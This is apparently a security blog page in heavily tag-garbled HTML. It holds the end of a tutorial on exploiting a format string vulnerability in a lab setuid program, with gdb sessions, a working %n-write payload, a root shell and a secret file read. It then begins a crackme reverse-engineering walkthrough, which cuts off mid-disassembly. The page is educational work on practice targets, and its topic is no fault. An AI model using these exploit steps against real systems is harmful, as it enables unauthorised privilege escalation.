pAnd lastly to make the second number correct:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"10/span span class="o"=/span 0x1bffc/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"11/span span class="o"=/span 0x1bfff/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pSo we have our values right, let's run it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V�CCCCC :/span/span span class="code-line"span class="go"process 956 is executing new program: /bin/bash/span/span span class="code-line"span class="gp"testuser@dev:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pCool, we got a shell but as we are running it in gdb and gdb hasn't got the setuid bit set its not running and root, with this knowledge let try to get this to work outside of gdb:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: T�V�CCCCC :/span/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pDidn't work, most likely our pointers aren't aligned again, so now to get them aligned:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$x : %51343u%128\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: T�V�CCCCC :/span/span span class="code-line"span class="go"32212229443a204343/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$x : %51343u%125\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: T�V�CCCCC :/span/span span class="code-line"span class="go"322122294449a5400/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCCC : %63325u%125\$x : %51343u%126\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: T�V�CCCCCC :/span/span span class="code-line"span class="go"32212229448049a56/span/span span class="code-line"/code/pre/div /td/tr/table pThat looks ok, we added a 'C' so let's minus 1 from our padding and try:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCCC : %63324u%125\$n : %51343u%126\$n\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: T�V�CCCCCC :/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED! :-)/p pSo we've got root through a format string vulnerability./p pI just wanted to demonstrate the second format string vulnerability quickly:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"testuser@dev:~$ /spanln -s app %x/span span class="code-line"span class="gp"testuser@dev:~$ ./%/spanx/span span class="code-line"span class="go"Usage: ./bffff654 lt;passwordgt;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is an interesting case, see if you can root it!/p h2Conclusion/h2 pInput that can be controlled by a user should never be trusted, this vulnerability could have been easily avoided by using the printf function with a static format string instead of passing user input as the first argument./p pThis was a very simple and obvious example of a format string vulnerability but they aren't always as easy to spot. I will likely write different examples in later tutorials./p pHappy Hacking :-)/p

eXploit
An Easy Linux Crackme0xe7
11 May 2014 at 08:28

An Easy Linux Crackme

eXploit

By: 0xe7

11 May 2014 at 08:28

pThe website http://crackmes.de contains a huge collection of applications that have been specifically created for people to practice a href="https://en.wikipedia.org/wiki/Reverse_engineering"reverse engineering/a, a href="https://en.wikipedia.org/wiki/Software_cracking"software cracking/a and a href="https://en.wikipedia.org/wiki/Keygen"keygen/a writing./p pThis solution tutorial is for a very easy one but one that can be cracked without much reverse engineering experience and knowledge. It will, however, help if you understand how function calls work at the assembly level and how the stack works./p !--more-- h2The App/h2 pHere we will take on this challenge: http://crackmes.de/users/seveb/crackme1//p pWe will work on the 32 bit version, as we will see this version is actually broken but the answer that we get works fine on the 64 bit version./p h2Get To Know The App/h2 pLets try to find out some information about this application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spantar vxzf crackme01.tar.gz /span span class="code-line"span class="go"crackmes//span/span span class="code-line"span class="go"crackmes/crackme1_64bit/span/span span class="code-line"span class="go"crackmes/crackme1_32bit/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"cd/span crackmes/span span class="code-line"span class="gp"root@dev:~/crackmes# /spanfile ./crackme1_32bit /span span class="code-line"span class="go"./crackme1_32bit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x54fefefcb89fa2ccc70e24ac5f15fe5f5f44ef8b, not stripped/span/span span class="code-line"span class="gp"root@dev:~/crackmes# /spanreadelf -h ./crackme1_32bit /span span class="code-line"span class="go"ELF Header:/span/span span class="code-line"span class="go" Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 /span/span span class="code-line"span class="go" Class: ELF32/span/span span class="code-line"span class="go" Data: 2#39;s complement, little endian/span/span span class="code-line"span class="go" Version: 1 (current)/span/span span class="code-line"span class="go" OS/ABI: UNIX - System V/span/span span class="code-line"span class="go" ABI Version: 0/span/span span class="code-line"span class="go" Type: EXEC (Executable file)/span/span span class="code-line"span class="go" Machine: Intel 80386/span/span span class="code-line"span class="go" Version: 0x1/span/span span class="code-line"span class="go" Entry point address: 0x8048510/span/span span class="code-line"span class="go" Start of program headers: 52 (bytes into file)/span/span span class="code-line"span class="go" Start of section headers: 4508 (bytes into file)/span/span span class="code-line"span class="go" Flags: 0x0/span/span span class="code-line"span class="go" Size of this header: 52 (bytes)/span/span span class="code-line"span class="go" Size of program headers: 32 (bytes)/span/span span class="code-line"span class="go" Number of program headers: 9/span/span span class="code-line"span class="go" Size of section headers: 40 (bytes)/span/span span class="code-line"span class="go" Number of section headers: 30/span/span span class="code-line"span class="go" Section header string table index: 27/span/span span class="code-line"span class="gp"root@dev:~/crackmes# /span./crackme1_32bit /span span class="code-line"span class="go"Please enter the secret number: 0123456789/span/span span class="code-line"span class="go"Nope./span/span span class="code-line"span class="gp"root@dev:~/crackmes# echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"span class="gp"root@dev:~/crackmes# /spanstrings ./crackme1_32bit /span span class="code-line"span class="go"/lib/ld-linux.so.2/span/span span class="code-line"span class="go"libc.so.6/span/span span class="code-line"span class="go"_IO_stdin_used/span/span span class="code-line"span class="go"fflush/span/span span class="code-line"span class="go"exit/span/span span class="code-line"span class="go"__isoc99_scanf/span/span span class="code-line"span class="go"puts/span/span span class="code-line"span class="go"__stack_chk_fail/span/span span class="code-line"span class="go"stdin/span/span span class="code-line"span class="go"printf/span/span span class="code-line"span class="go"strlen/span/span span class="code-line"span class="go"atoi/span/span span class="code-line"span class="go"strcmp/span/span span class="code-line"span class="go"__libc_start_main/span/span span class="code-line"span class="go"__gmon_start__/span/span span class="code-line"span class="go"GLIBC_2.7/span/span span class="code-line"span class="go"GLIBC_2.4/span/span span class="code-line"span class="go"GLIBC_2.0/span/span span class="code-line"span class="go"PTRh0/span/span span class="code-line"span class="go"QVhL/span/span span class="code-line"span class="go"D$L1/span/span span class="code-line"span class="go"D$6lt;9u /span/span span class="code-line"span class="go"D$5lt;6t/span/span span class="code-line"span class="go"D$-E/span/span span class="code-line"span class="go"\$Le3/span/span span class="code-line"span class="go"[^_]/span/span span class="code-line"span class="go"Nope./span/span span class="code-line"span class="go"Good job./span/span span class="code-line"span class="go"Please enter the secret number: /span/span span class="code-line"span class="gp"%/span23s/span span class="code-line"span class="go"Evilzone/span/span span class="code-line"span class="go"The Password translates into %s, /span/span span class="code-line"span class="go";*2$quot;/span/span span class="code-line"/code/pre/div /td/tr/table pWe have got a lot of information here, firstly we run codefile/code on line 6 and can see that the file is actually a 32 bit a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format"ELF file/a. This is the file format used for Linux executables./p pLooking at the a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#File_header"elf headers/a using codereadelf -h/code tells us the a href="https://en.wikipedia.org/wiki/Entry_point"entry point/a address of the application (on line 19), meaning this is the point in memory where execution begins, this could be useful later./p pRunning the application, it asks us for a "secret number". Putting in something random gives us the output codeNope./code (on line 31) and exits with exit code 1 (on line 33)./p pLastly we've run codestrings/code against the application (on line 34) which gives us a list of all of the clear text strings in the executable. 2 things stand out, the codeGood job./code string on line 62, which looks like this is printed to screen if you input the right number, and the codeEvilzone/code as well as the codeThe Password translates into %s,/code stings on lines 65 and 66 respectively. Based on these last 2 strings it looks like the secret number has something to do with the string codeEvilzone/code./p h2Disassemble / Debug The App/h2 pNormally now we could use a href="https://sourceware.org/binutils/docs/binutils/objdump.html"objdump/a but as this is such an easy one lets go straight into live a href="https://en.wikipedia.org/wiki/Debugging"debugging/a with codegdb/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/crackmes# /spangdb -q ./crackme1_32bit/span span class="code-line"span class="go"Reading symbols from /root/crackme/crackmes/crackme1_32bit...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"info functions/span/span span class="code-line"span class="go"All defined functions:/span/span span class="code-line"/span span class="code-line"span class="go"Non-debugging symbols:/span/span span class="code-line"span class="go"0x08048420 _init/span/span span class="code-line"span class="go"0x08048460 strcmp/span/span span class="code-line"span class="go"0x08048460 strcmp@plt/span/span span class="code-line"span class="go"0x08048470 printf/span/span span class="code-line"span class="go"0x08048470 printf@plt/span/span span class="code-line"span class="go"0x08048480 fflush/span/span span class="code-line"span class="go"0x08048480 fflush@plt/span/span span class="code-line"span class="go"0x08048490 __stack_chk_fail/span/span span class="code-line"span class="go"0x08048490 __stack_chk_fail@plt/span/span span class="code-line"span class="go"0x080484a0 puts/span/span span class="code-line"span class="go"0x080484a0 puts@plt/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__@plt/span/span span class="code-line"span class="go"0x080484c0 exit/span/span span class="code-line"span class="go"0x080484c0 exit@plt/span/span span class="code-line"span class="go"0x080484d0 strlen/span/span span class="code-line"span class="go"0x080484d0 strlen@plt/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main@plt/span/span span class="code-line"span class="go"0x080484f0 __isoc99_scanf/span/span span class="code-line"span class="go"0x080484f0 __isoc99_scanf@plt/span/span span class="code-line"span class="go"0x08048500 atoi/span/span span class="code-line"span class="go"0x08048500 atoi@plt/span/span span class="code-line"span class="go"0x08048510 _start/span/span span class="code-line"span class="go"0x08048540 __x86.get_pc_thunk.bx/span/span span class="code-line"span class="go"0x08048550 deregister_tm_clones/span/span span class="code-line"span class="go"0x08048580 register_tm_clones/span/span span class="code-line"span class="go"0x080485c0 __do_global_dtors_aux/span/span span class="code-line"span class="go"0x080485e0 frame_dummy/span/span span class="code-line"span class="go"0x0804860d nope/span/span span class="code-line"span class="go"0x08048638 yes/span/span span class="code-line"span class="go"0x0804864c main/span/span span class="code-line"span class="go"0x080487c0 __libc_csu_init/span/span span class="code-line"span class="go"0x08048830 __libc_csu_fini/span/span span class="code-line"span class="go"0x08048834 _fini/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804864c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804864d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804864f lt;+3gt;: push ebx/span/span span class="code-line"span class="go" 0x08048650 lt;+4gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048653 lt;+7gt;: sub esp,0x50/span/span span class="code-line"span class="go" 0x08048656 lt;+10gt;: mov eax,gs:0x14/span/span span class="code-line"span class="go" 0x0804865c lt;+16gt;: mov DWORD PTR [esp+0x4c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+20gt;: xor eax,eax/span/span span class="code-line"span class="go" 0x08048662 lt;+22gt;: mov DWORD PTR [esp],0x8048860/span/span span class="code-line"span class="go" 0x08048669 lt;+29gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x0804866e lt;+34gt;: lea eax,[esp+0x35]/span/span span class="code-line"span class="go" 0x08048672 lt;+38gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048676 lt;+42gt;: mov DWORD PTR [esp],0x8048881/span/span span class="code-line"span class="go" 0x0804867d lt;+49gt;: call 0x80484f0 lt;__isoc99_scanf@pltgt;/span/span span class="code-line"span class="go" 0x08048682 lt;+54gt;: mov DWORD PTR [esp+0x28],eax/span/span span class="code-line"span class="go" 0x08048686 lt;+58gt;: cmp DWORD PTR [esp+0x28],0x1/span/span span class="code-line"span class="go" 0x0804868b lt;+63gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x0804868d lt;+65gt;: movzx eax,BYTE PTR [esp+0x36]/span/span span class="code-line"span class="go" 0x08048692 lt;+70gt;: cmp al,0x39/span/span span class="code-line"span class="go" 0x08048694 lt;+72gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x08048696 lt;+74gt;: movzx eax,BYTE PTR [esp+0x35]/span/span span class="code-line"span class="go" 0x0804869b lt;+79gt;: cmp al,0x36/span/span span class="code-line"span class="go" 0x0804869d lt;+81gt;: je 0x80486a6 lt;main+90gt;/span/span span class="code-line"span class="go" 0x0804869f lt;+83gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go" 0x080486a4 lt;+88gt;: jmp 0x80486b3 lt;main+103gt;/span/span span class="code-line"span class="go" 0x080486a6 lt;+90gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x080486ab lt;+95gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486ae lt;+98gt;: call 0x8048480 lt;fflush@pltgt;/span/span span class="code-line"span class="go" 0x080486b3 lt;+103gt;: mov DWORD PTR [esp+0x2d],0x0/span/span span class="code-line"span class="go" 0x080486bb lt;+111gt;: mov DWORD PTR [esp+0x31],0x0/span/span span class="code-line"span class="go" 0x080486c3 lt;+119gt;: mov BYTE PTR [esp+0x2d],0x45/span/span span class="code-line"span class="go" 0x080486c8 lt;+124gt;: mov DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go" 0x080486d0 lt;+132gt;: mov DWORD PTR [esp+0x1c],0x2/span/span span class="code-line"span class="go" 0x080486d8 lt;+140gt;: mov DWORD PTR [esp+0x20],0x3/span/span span class="code-line"span class="go" 0x080486e0 lt;+148gt;: mov DWORD PTR [esp+0x24],0x4/span/span span class="code-line"span class="go" 0x080486e8 lt;+156gt;: jmp 0x804875a lt;main+270gt;/span/span span class="code-line"span class="go" 0x080486ea lt;+158gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x080486ee lt;+162gt;: mov eax,DWORD PTR [esp+0x1c]/span/span span class="code-line"span class="go" 0x080486f2 lt;+166gt;: add eax,edx/span/span span class="code-line"span class="go" 0x080486f4 lt;+168gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span class="go" 0x080486f7 lt;+171gt;: mov BYTE PTR [esp+0x15],al/span/span span class="code-line"span class="go" 0x080486fb lt;+175gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x080486ff lt;+179gt;: mov eax,DWORD PTR [esp+0x20]/span/span span class="code-line"span class="go" 0x08048703 lt;+183gt;: add eax,edx/span/span span class="code-line"span class="go" 0x08048705 lt;+185gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span 